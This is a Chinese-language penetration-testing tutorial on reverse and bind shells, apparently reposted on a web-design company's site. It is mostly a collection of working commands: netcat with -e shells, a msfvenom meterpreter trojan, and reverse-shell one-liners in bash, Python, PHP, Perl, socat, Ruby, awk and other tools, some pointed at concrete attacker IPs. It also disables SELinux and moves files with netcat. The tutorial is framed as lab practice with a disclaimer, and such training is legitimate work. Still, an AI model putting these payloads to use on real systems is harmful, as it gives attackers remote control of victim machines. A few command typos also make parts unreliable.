內(nèi)網(wǎng)滲透中反彈shell的示例分析

這篇文章將為大家詳細(xì)講解有關(guān)內(nèi)網(wǎng)滲透中反彈shell的示例分析，小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，希望大家閱讀完這篇文章后可以有所收獲。

松桃網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)！從網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、響應(yīng)式網(wǎng)站設(shè)計(jì)等網(wǎng)站項(xiàng)目制作，到程序開發(fā)，運(yùn)營(yíng)維護(hù)。創(chuàng)新互聯(lián)2013年開創(chuàng)至今到現(xiàn)在10年的時(shí)間，我們擁有了豐富的建站經(jīng)驗(yàn)和運(yùn)維經(jīng)驗(yàn)，來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。

聲明：文章技術(shù)僅供網(wǎng)絡(luò)安全技術(shù)人員及白帽子使用，任何個(gè)人或組織不可用于
違法犯罪，一經(jīng)發(fā)現(xiàn)直接上報(bào)國(guó)家安全機(jī)關(guān)處理。

反彈shell

反彈shell:
在攻擊者機(jī)器獲得受害者機(jī)器的命令行。

背景：

對(duì)內(nèi)網(wǎng)有更深入的理解，了解內(nèi)網(wǎng)的組織結(jié)構(gòu)，為了更好的進(jìn)行內(nèi)網(wǎng)滲透。

正向反彈shell：

目的：

利用nc正向連接目標(biāo)服務(wù)器的shell，獲得目標(biāo)服務(wù)器的控制權(quán)限(dmz大型靶場(chǎng))

前提：

攻擊者可以訪問（連接）web服務(wù)器的目標(biāo)（開放）端口，web服務(wù)器防火墻未攔截攻擊者的入站流量。適用于，能夠訪問到被控機(jī)器的開放端口。

實(shí)驗(yàn)環(huán)境：

物理機(jī)(攻擊機(jī))：

目標(biāo)服務(wù)器（公網(wǎng)windows）:***.***.88.201:6666

網(wǎng)絡(luò)拓?fù)洌?/h4>

實(shí)驗(yàn)步驟：

步驟一:

主動(dòng)連接被控主機(jī)shell，在被控主機(jī)上使用nc監(jiān)聽6666端口，成功反彈shell后就控制目標(biāo)服務(wù)器的cmd.exe程序（只要連接到目標(biāo)服務(wù)器的6666端口，就會(huì)執(zhí)行cmd.exe），結(jié)果如下圖所示：

命令：

#被控主機(jī)為Windows，使用以下命令：
nc.exe -lvp 4444 -e cdm.exe
#被控主機(jī)為linux，使用以下命令：
nc -lvp 4444 -e /bin/bash

下圖為被控主機(jī)：

步驟二：

攻擊機(jī)連接目標(biāo)服務(wù)器的6666端口，結(jié)果如下圖所示：

命令：

#攻擊者：
#nc -vv 被控服務(wù)器ip 4444
nc -vv ***.***.88.201 6666

下圖是攻擊者主機(jī)：

反向反彈shell：

目的：

利用nc反向反彈shell到攻擊者本地，獲得目標(biāo)服務(wù)器的控制權(quán)限(dmz大型靶場(chǎng))

前提：

1、防火墻對(duì)web服務(wù)器(被控主機(jī))出站流量放行。

2、攻擊者必須有一個(gè)公網(wǎng)ip。

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999

被控機(jī)器（公網(wǎng)windows）：

網(wǎng)絡(luò)拓?fù)洌?/h4>

實(shí)驗(yàn)步驟：

步驟一:

攻擊者外網(wǎng)vps監(jiān)聽9999端口：
攻擊者kali（公網(wǎng)ip）進(jìn)行監(jiān)聽本地9999端口，被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口,結(jié)果如下圖所示：
命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
nc -lvvp 9999

下圖為公網(wǎng)kali:

步驟二：

把被控主機(jī)的shell反彈到攻擊者kali的9999端口，如下圖所示：

命令：

#nc -e /bin/bash 攻擊者公網(wǎng)ip 9999 (反彈linux shell) 
#nc -e cmd.exe 攻擊者公網(wǎng)ip 9999(反彈windows shell)

下圖為被控主機(jī):

步驟二：

查看kali,顯示成功反彈目標(biāo)服務(wù)器的shell，如下圖所示：

分析：

能夠反彈成功，需要攻擊者開啟公網(wǎng)kali的監(jiān)聽端口，并讓防火墻對(duì)經(jīng)過9999端口的流量進(jìn)行放行；

被攻擊者需要有攻擊者的公網(wǎng)ip，并且被攻擊者的流量能夠出來。

其他方式反彈shell：

msf反彈：

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999

被控主機(jī)（虛擬機(jī)win8）：

實(shí)驗(yàn)步驟：

步驟一:

攻擊者公網(wǎng)vps監(jiān)聽9999端口：
攻擊者在公網(wǎng)kali（公網(wǎng)ip）使用msf的msfconsole進(jìn)行監(jiān)聽9999端口的木馬反彈，結(jié)果如下圖所示：

命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
msfconsole 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ***.***.23.106:9999
set lport 9999

步驟三:

生成一個(gè)反彈木馬，并將生成的木馬上傳到被控主機(jī)（虛擬機(jī)win8）上，并進(jìn)行點(diǎn)擊運(yùn)行，使被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口,如下圖所示：

命令：

#使用msfvenom生成反彈木馬：
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=***.***.23.106:9999lport=9999 -f exe -o test.exe
#這里是使用finalshell遠(yuǎn)程連接公網(wǎng)kali的，所以使用sz命令下載剛才生成的木馬到物理機(jī)：
sz test.exe
#下面就是把下載下來的木馬文件放到被控主機(jī)（虛擬機(jī)win8）。

步驟三:

在被控主機(jī)（虛擬機(jī)win8）上，點(diǎn)擊運(yùn)行test.exe(這個(gè)木馬文件)，并進(jìn)行查看公網(wǎng)kali反彈情況，如下圖所示：

bash反彈：

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：..23.106:9999

被控機(jī)器(虛擬機(jī)centos6.5)：

實(shí)驗(yàn)步驟：

接收端(攻擊者ip,公網(wǎng)): nc -lvvp 端口
發(fā)送端(被控主機(jī))：bash -i >& /dev/tcp/攻擊者ip（公網(wǎng)）/攻擊者端口 0>&1
發(fā)送端(被控主機(jī))：0<&31-;exec 31<>/dev/tcp/攻擊者ip（公網(wǎng)）/攻擊者端口; sh <&31 >&31 2>&31

步驟一:

為了保證環(huán)境的貼近實(shí)戰(zhàn)，保持防火墻開啟狀態(tài)。（反彈shell有正向和反向的，我們90%都是反向反彈的shell。

正常情況下，攻擊者是無法正向連接目標(biāo)服務(wù)器的；除了開啟22端口，通過ssh可以連接進(jìn)來的，但是ssh我們不知道帳號(hào)密碼；我們最主要的目的是獲取目標(biāo)主機(jī)的反向shell，所以防火墻可以不用關(guān)閉）。只關(guān)閉setenforce（setlinux），并查看防火墻狀態(tài)，如下圖所示：

命令：

#關(guān)閉setlinux
setenforce 0
#查看防火墻狀態(tài)：
service iptables status

步驟二:

攻擊者外網(wǎng)vps監(jiān)聽9999端口：
攻擊者kali（公網(wǎng)ip）進(jìn)行監(jiān)聽本地9999端口，被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口,結(jié)果如下圖所示：

命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
nc -lvvp 9999

命令：

bash -i >& /dev/tcp/***.***.23.106/9999 0>&1

步驟三:

在被控機(jī)器(虛擬機(jī)centos6.5)上，使用bash把shell反彈到攻擊者公網(wǎng)kali上，并進(jìn)行查看公網(wǎng)kali反彈情況，如下圖所示：

python反彈：

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999

被控機(jī)器(虛擬機(jī)centos6.5)：

實(shí)驗(yàn)步驟：

接收端(攻擊者ip,公網(wǎng)): nc -lvvp 端口
發(fā)送端(被控主機(jī))：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻擊者公網(wǎng)ip",攻擊者公網(wǎng)監(jiān)聽端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

步驟一:

攻擊者公網(wǎng)vps監(jiān)聽9999端口：
攻擊者kali（公網(wǎng)ip）進(jìn)行監(jiān)聽本地9999端口，被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口,結(jié)果如下圖所示：

命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
nc -lvvp 9999

步驟二:

在被控機(jī)器(虛擬機(jī)centos6.5)上，使用python把shell反彈到攻擊者公網(wǎng)kali上，并進(jìn)行查看公網(wǎng)kali反彈情況，如下圖所示：

命令：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("***.***.23.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

php反彈：

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999

被控機(jī)器(虛擬機(jī)centos6.5)：

實(shí)驗(yàn)步驟：

接收端(攻擊者ip,公網(wǎng)): nc -lvvp端口
發(fā)送端(被控主機(jī))：bash -i >& /dev/tcp/攻擊者ip（公網(wǎng)）/攻擊者端口 0>&1
發(fā)送端(被控主機(jī))：php -r '$sock=fsockopen("攻擊者ip",端口);exec("/bin/sh -i <&3 >&3 2>&3");'

步驟一:

攻擊者公網(wǎng)vps監(jiān)聽9999端口：
攻擊者kali（公網(wǎng)ip）進(jìn)行監(jiān)聽本地9999端口，被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口：

命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
nc -lvvp 9999

步驟二:

在被控機(jī)器(虛擬機(jī)centos6.5)上，使用php把shell反彈到攻擊者公網(wǎng)kali上，并進(jìn)行查看公網(wǎng)kali反彈情況：
命令：

php -r '$sock=fsockopen("***.***.23.106",9999);exec("/bin/bash -i <&3 >&3 2>&3");'

perl反彈：

實(shí)驗(yàn)環(huán)境：

攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999

被控機(jī)器(虛擬機(jī)centos6.5)：

實(shí)驗(yàn)步驟：

接收端(攻擊者ip,公網(wǎng)): nc -lvvp端口
發(fā)送端：perl -e 'use Socket;$i="攻擊者ip";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

步驟一:

攻擊者公網(wǎng)vps監(jiān)聽9999端口：
攻擊者kali（公網(wǎng)ip）進(jìn)行監(jiān)聽本地9999端口，被控主機(jī)反彈shell到kali(公網(wǎng)ip)的9999端口,結(jié)果如下圖所示：

命令：

#攻擊機(jī)器（公網(wǎng)kali）：***.***.23.106:9999
nc -lvvp 9999

步驟三:

在被控機(jī)器(虛擬機(jī)centos6.5)上，使用bash把shell反彈到攻擊者公網(wǎng)kali上，并進(jìn)行查看公網(wǎng)kali反彈情況，如下圖所示：

命令：

perl -e 'use Socket;$i="***.***.23.106";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

linux反彈shell姿勢(shì)合集：

在目標(biāo)服務(wù)器（linux）上面進(jìn)行反彈shell時(shí)，可以通過以下命令，查看目標(biāo)服務(wù)器上面有沒有安裝對(duì)應(yīng)的程序：
命令：

#比如查看目標(biāo)服務(wù)器上面有沒有安裝php服務(wù):
rpm -q php

linux反彈shell總結(jié)

1\.1發(fā)送文件\(公網(wǎng)發(fā)內(nèi)網(wǎng)\)
文件發(fā)送端：nc \-lp 6666 < 文件
文件接收端：nc 發(fā)送端ip 發(fā)送端端口 \> 新文件

1\.2發(fā)送文件\(內(nèi)網(wǎng)發(fā)公網(wǎng)\)
文件發(fā)送端：nc \-lp 6666 \> 文件
文件接收端：nc 發(fā)送端ip 發(fā)送端端口 < 新文件

2\.聊天
發(fā)送端：nc \-lp 6666
接收端：nc 發(fā)送端ip 發(fā)送端端口

3\.1發(fā)送shell
發(fā)送端\(公網(wǎng)服務(wù)器\)：nc \-lvvp 6666 \-e /bin/bash
接收端：nc 發(fā)送端ip 發(fā)送端攻擊者ip

3\.2反彈shell
接收端：nc \-lvvp 6666
發(fā)送端\(內(nèi)網(wǎng)網(wǎng)服務(wù)器\)：nc 接收端ip 接收端端口 \-e /bin/bash

4\.bash反彈
接收端\(hackip\,公網(wǎng)\)：nc \-lvvp 端口
發(fā)送端\(受害者\(yùn))：bash \-i \>& /dev/tcp/111\.230\.170\.95/9985 0\>&1
發(fā)送端\(受害者\(yùn))：0<&31\-;exec 31<\>/dev/tcp/111\.230\.170\.95/9985;sh <&31 \>&31 2\>&31

5\.1socat反彈\(tcp\)
接收端\(攻擊機(jī)\)：\./socat TCP\-LISTEN:端口 \-
發(fā)送端\(靶機(jī)\)：\./socat exec:'bash \-li'\,pty\,stderr\,setsid\,sigint\,sane tcp:攻擊機(jī)ip:攻擊機(jī)端口

5\.2socat反彈\(udp\)
接收端:nc \-lvvp 8080
發(fā)送端:socat udp\-connect:攻擊者ip:端口 exec:'bash \-li'\,pty\,stderr\,sane 2\>&1\>/dev/null &

6\.python反彈
接收端\(攻擊機(jī)\,外網(wǎng)\)：nc \-lvvp 端口
發(fā)送端\(靶機(jī)\)：python \-c 'import socket\,subprocess\,os;s=socket\.socket\(socket\.AF\_INET\,socket\.SOCK\_STREAM\);s\.connect\(\("接收端ip"\,接收端端口\)\);os\.dup2\(s\.fileno\(\)\,0\); os\.dup2\(s\.fileno\(\)\,1\); os\.dup2\(s\.fileno\(\)\,2\);p=subprocess\.call\(\["/bin/sh"\,"\-i"\]\);'

7\.PHP反彈
接收端：nc \-lvvp 端口
發(fā)送端：php \-r '$sock=fsockopen\("攻擊者ip"\,端口\);exec\("/bin/sh \-i <&3 \>&3 2\>&3"\);'

8\.JAVA反彈
接收端：nc \-lvvp 端口
發(fā)送端：
r = Runtime\.getRuntime\(\)
p = r\.exec\(\["/bin/bash"\,"\-c"\,"exec 5<\>/dev/tcp/攻擊者ip/端口;cat <&5 \| while read line; do $line 2\>&5 \>&amp5; done"\] as String\[\]\)
p\.waitFor\(\)

9\.perl反彈
接收端：nc \-lvvp 端口
發(fā)送端：
perl \-e 'use Socket;$i="攻擊者ip";$p=8080;socket\(S\,PF\_INET\,SOCK\_STREAM\,getprotobyname\("tcp"\)\);if\(connect\(S\,sockaddr\_in\($p\,inet\_aton\($i\)\)\)\)\{open\(STDIN\,"\>&S"\);open\(STDOUT\,"\>&S"\);open\(STDERR\,"\>&S"\);exec\("/bin/sh \-i"\);\};'

10\.ruby反彈
接收端：nc \-lvvp 端口
發(fā)送端：
ruby \-rsocket \-e 'exit if fork;c=TCPSocket\.new\("攻擊者ip"\,"端口"\);while\(cmd=c\.gets\);IO\.popen\(cmd\,"r"\)\{\|io\|c\.print io\.read\}end'

11\.telnet反彈
接收端：nc \-lvvp 端口
發(fā)送端：
mknod backpipe p && telnet 攻擊者ip 端口 0<backpipe \| /bin/bash 1\>backpipe

12\.lua反彈\(安裝lua環(huán)境：apt\-get install lua\*\)
接收端：nc \-lvvp 端口
發(fā)送端：lua \-e "local s=require\('socket'\);local t=assert\(s\.tcp\(\)\);t:connect\('攻擊者ip'\,端口\);while true do local r\,x=t:receive\(\);local f=assert\(io\.popen\(r\,'r'\)\);local b=assert\(f:read\('\*a'\)\);t:send\(b\);end;f:close\(\);t:close\(\);"

13\.awk反彈
接收端：nc \-lvvp 端口
發(fā)送端：awk 'BEGIN\{s="/inet/tcp/0/攻擊者ip/端口";while\(1\)\{do\{s\|&getline c;if\(c\)\{while\(\(c\|&getline\)\>0\)print $0\|&amps;close\(c\)\}\}while\(c\!="exit"\);close\(s\)\}\}'

14\.ksh反彈
接收端：nc \-lvvp 端口
發(fā)送端：ksh \-c 'ksh \>/dev/tcp/攻擊者ip/端口 2\>&1 <&1'

15\.msfvenom生成各種payload
接收端：nc \-lvvp 端口
查找payload：msfvenom \-l payload \|grep 'cmd/unix/reverse'
生成payload：msfvenom \-p cmd/unix/reverse\_模塊 lhost=接收端ip lport=接收端端口 R

關(guān)于“內(nèi)網(wǎng)滲透中反彈shell的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，使各位可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，請(qǐng)把它分享出去讓更多的人看到。

分享題目：內(nèi)網(wǎng)滲透中反彈shell的示例分析
文章地址：http://muchs.cn/article8/ppjhip.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供手機(jī)網(wǎng)站建設(shè)、移動(dòng)網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)公司、網(wǎng)站維護(hù)、軟件開發(fā)、小程序開發(fā)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)